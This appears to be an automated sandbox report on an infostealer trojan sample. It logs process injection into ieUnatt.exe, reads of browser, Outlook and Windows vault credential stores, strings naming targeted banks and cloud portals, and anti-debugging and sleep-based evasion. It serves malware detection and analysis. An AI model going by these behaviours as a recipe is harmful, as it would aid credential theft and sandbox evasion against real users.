                Source: NFhRxwbegd.exe, 00000000.00000000.2207833738.0000000000434000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameCuUp.exe, vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000005.00000002.2561345341.00000000019CD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000005.00000002.2560705901.000000000147C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameIEUNATT.EXED vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001448000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameIEUNATT.EXED vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe Binary or memory string: OriginalFilenameCuUp.exe, vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: NFhRxwbegd.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NFhRxwbegd.exe.log
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\ieUnatt.exe File created: C:\Users\user\AppData\Local\Temp\086604I_P
                Source: NFhRxwbegd.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: ieUnatt.exe, 00000008.00000002.4082613666.0000000003494000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2748377158.000000000348A000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.00000000034B9000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000348A000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2747478767.0000000003469000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: NFhRxwbegd.exe Virustotal: Detection: 76%
                Source: NFhRxwbegd.exe ReversingLabs: Detection: 78%
                Source: unknown Process created: C:\Users\user\Desktop\NFhRxwbegd.exe "C:\Users\user\Desktop\NFhRxwbegd.exe"
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Process created: C:\Users\user\Desktop\NFhRxwbegd.exe "C:\Users\user\Desktop\NFhRxwbegd.exe"
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Process created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                Source: C:\Windows\SysWOW64\ieUnatt.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Section loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: NFhRxwbegd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: NFhRxwbegd.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ieUnAtt.pdbGCTL source: NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001467000.00000004.00000020.00020000.00000000.sdmp, NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001448000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2762247141.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F42000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gsolWhsjddFW.exe, 00000007.00000002.4082242168.000000000049E000.00000002.00000001.01000000.0000000C.sdmp, gsolWhsjddFW.exe, 00000009.00000000.2628798758.000000000049E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001467000.00000004.00000020.00020000.00000000.sdmp, NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001448000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2762247141.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F42000.00000004.00000020.00020000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000003.2488431094.0000000000F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: NFhRxwbegd.exe, 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2562941054.0000000004E92000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2560752916.0000000004CED000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: NFhRxwbegd.exe, NFhRxwbegd.exe, 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2562941054.0000000004E92000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2560752916.0000000004CED000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 0_2_06DE949F push es; iretd 0_2_06DE94A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 0_2_06DE7B2B push es; iretd 0_2_06DE7B2C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_0040D8D0 pushad ; iretd 5_2_0040D8D1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_004031B0 push eax; ret 5_2_004031B2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_0040D3DE pushad ; retf 5_2_0040D3DF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_00414C77 push es; iretd 5_2_00414C79
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_00415DE9 push ebp; iretd 5_2_00415E4B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_0040E61C push es; retf 5_2_0040E61D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_00418699 push esp; iretd 5_2_0041869A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_00405F99 push edi; retf 5_2_00405F9A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_018A225F pushad ; ret 5_2_018A27F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_018A27FA pushad ; ret 5_2_018A27F9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_018D09AD push ecx; mov dword ptr [esp], ecx 5_2_018D09B6
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_018A283D push eax; iretd 5_2_018A2858
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_018A1368 push eax; iretd 5_2_018A1369
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Code function: 7_2_03602B48 pushad ; iretd 7_2_03602B49
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Code function: 7_2_035FB211 push edi; retf 7_2_035FB212
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Code function: 7_2_0360D911 push esp; iretd 7_2_0360D912
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Code function: 7_2_0360B061 push ebp; iretd 7_2_0360B0C3
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Code function: 7_2_03603894 push es; retf 7_2_03603895
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Code function: 7_2_03602656 pushad ; retf 7_2_03602657
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe Code function: 7_2_03609EEF push es; iretd 7_2_03609EF1
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_050709AD push ecx; mov dword ptr [esp], ecx 8_2_050709B6
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F7C02E push cs; iretd 8_2_02F7C02F
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F72970 pushfd ; retn F197h 8_2_02F729E2
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F72970 push eax; retf DEECh 8_2_02F72A30
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F80C93 push ebp; iretd 8_2_02F80C9A
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F72C36 push ebp; iretd 8_2_02F72C98
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F62DE6 push edi; retf 8_2_02F62DE7
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F80D69 pushad ; iretd 8_2_02F80D6A
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F81683 push esi; iretd 8_2_02F81684
                Source: NFhRxwbegd.exe Static PE information: section name: .text entropy: 7.7118543054042075
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\ieUnatt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: NFhRxwbegd.exe PID: 2488, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: DB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: 27D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: 2700000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: 74E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: 84E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: 8690000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: 9690000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: A120000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: B120000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Memory allocated: C120000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_0191096E rdtsc 5_2_0191096E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ieUnatt.exe API coverage: 2.7 %
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe TID: 3132 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 6288 Thread sleep count: 40 > 30
                Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 6288 Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe TID: 5964 Thread sleep time: -45000s >= -30000s
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe TID: 5964 Thread sleep time: -36000s >= -30000s
                Source: C:\Windows\SysWOW64\ieUnatt.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 8_2_02F7CC50 FindFirstFileW,FindNextFileW,FindClose, 8_2_02F7CC50
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: ieUnatt.exe, 00000008.00000002.4082613666.000000000341A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%)
                Source: 086604I_P.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 086604I_P.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 086604I_P.8.dr Binary or memory string: discord.comVMware20,11696487552f
                Source: ieUnatt.exe, 00000008.00000002.4089511698.0000000008588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ivebrokers.comVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: ieUnatt.exe, 00000008.00000002.4089511698.0000000008588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,1169648
                Source: 086604I_P.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 086604I_P.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: global block list test formVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: ieUnatt.exe, 00000008.00000002.4089511698.0000000008588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,116
                Source: 086604I_P.8.dr Binary or memory string: AMC password management pageVMware20,11696487552
                Source: gsolWhsjddFW.exe, 00000009.00000002.4084258036.000000000107F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2867343094.0000016B5168C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 086604I_P.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 086604I_P.8.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: 086604I_P.8.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: ieUnatt.exe, 00000008.00000002.4089511698.0000000008588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696487552}
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 086604I_P.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 086604I_P.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 086604I_P.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 086604I_P.8.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 086604I_P.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 086604I_P.8.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: 086604I_P.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 086604I_P.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 086604I_P.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 086604I_P.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 086604I_P.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\ieUnatt.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_0191096E rdtsc 5_2_0191096E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_00417D83 LdrLoadDll, 5_2_00417D83
                Source: C:\Users\user\Desktop\NFhRxwbegd.exe Code function: 5_2_0195019F mov eax, dword ptr fs:[00000030h] 5_2_0195019F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE5E7 mov eax, dword ptr fs:[00000030h]5_2_018FE5E7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D25E0 mov eax, dword ptr fs:[00000030h]5_2_018D25E0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C5ED mov eax, dword ptr fs:[00000030h]5_2_0190C5ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190C5ED mov eax, dword ptr fs:[00000030h]5_2_0190C5ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01966500 mov eax, dword ptr fs:[00000030h]5_2_01966500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4500 mov eax, dword ptr fs:[00000030h]5_2_019A4500
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE53E mov eax, dword ptr fs:[00000030h]5_2_018FE53E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE53E mov eax, dword ptr fs:[00000030h]5_2_018FE53E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE53E mov eax, dword ptr fs:[00000030h]5_2_018FE53E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE53E mov eax, dword ptr fs:[00000030h]5_2_018FE53E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FE53E mov eax, dword ptr fs:[00000030h]5_2_018FE53E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0535 mov eax, dword ptr fs:[00000030h]5_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8550 mov eax, dword ptr fs:[00000030h]5_2_018D8550
